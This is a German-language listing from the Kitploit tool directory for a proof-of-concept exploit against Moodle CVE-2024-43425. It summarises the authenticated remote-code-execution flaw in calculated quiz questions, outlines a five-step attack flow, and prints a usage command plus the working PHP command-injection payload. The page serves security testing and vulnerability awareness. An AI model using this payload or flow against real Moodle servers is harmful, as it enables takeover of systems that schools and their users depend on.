Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-43425-Poc — Proof-of-Concept-Exploit für Moodle CVE-2024-43425, der authentifizierte RCE über manipulierte berechnete Fragen ermöglicht. Automatisiert Login, Token-Extraktion, Payload-Upload und Auslösung für Sicherheitstests. | Kitploit
Tools/GitHubGitHub/aninfosec/cve-2024-43425-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubaninfosec/cve-2024-43425-poc

CVE-2024-43425-Poc

Proof-of-Concept-Exploit für Moodle CVE-2024-43425, der authentifizierte RCE über manipulierte berechnete Fragen ermöglicht. Automatisiert Login, Token-Extraktion, Payload-Upload und Auslösung für Sicherheitstests.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-43425-Poc

CVE-Übersicht CVE ID: CVE-2024-43425

Beschreibung: Moodle erlaubt es einem authentifizierten Benutzer mit Lehrerrechten, über die Quiz-Editor-Oberfläche eine schädliche berechnete Frage hochzuladen. Auswirkung: Remote Code Execution (RCE) Ursache: Unzureichende Bereinigung von mathematischen Payloads in berechneten Fragen, was über den Datensatz-Assistenten zu Command Injection führt.

##Voraussetzungen:

  • Gültige Anmeldedaten
  • Zugriff auf die Quiz-Editor-Oberfläche (in der Regel eine Lehrer- oder Admin-Rolle)
  • Bekannte cmid (Quiz-Modul-ID) und courseid

##Dieses Skript führt einen Angriff in 5 Schritten aus:

Schritt Beschreibung 1️ Login-Token abrufen (logintoken) 2️ Anmelden und eine gültige MoodleSession aufbauen 3️ sesskey, ctxid und Kategorie aus der Quiz-Bearbeitungsseite extrahieren 4️ Eine speziell präparierte berechnete Frage mit einem RCE-Payload hochladen 5️ Den Payload über die Datensatz-Assistenten-Seite auslösen

##Verwendungshinweise

Voraussetzungen: Python 3 Python-Bibliotheken: requests, bs4 (BeautifulSoup)

root@kitploit:~
pip3 install requests bs4
root@kitploit:~
python3 exploit_cve_2024_43425.py \
  --url http://192.168.2.12/moodle \
  --username test \
  --password 'Test@123' \
  --courseid 1 \
  --cmid 1 \
  --cmd 'whoami'

##Verwendeter Payload:

root@kitploit:~
answer[0] = "(1)->{system($_GET[chr(97)])}"
Tool herunterladen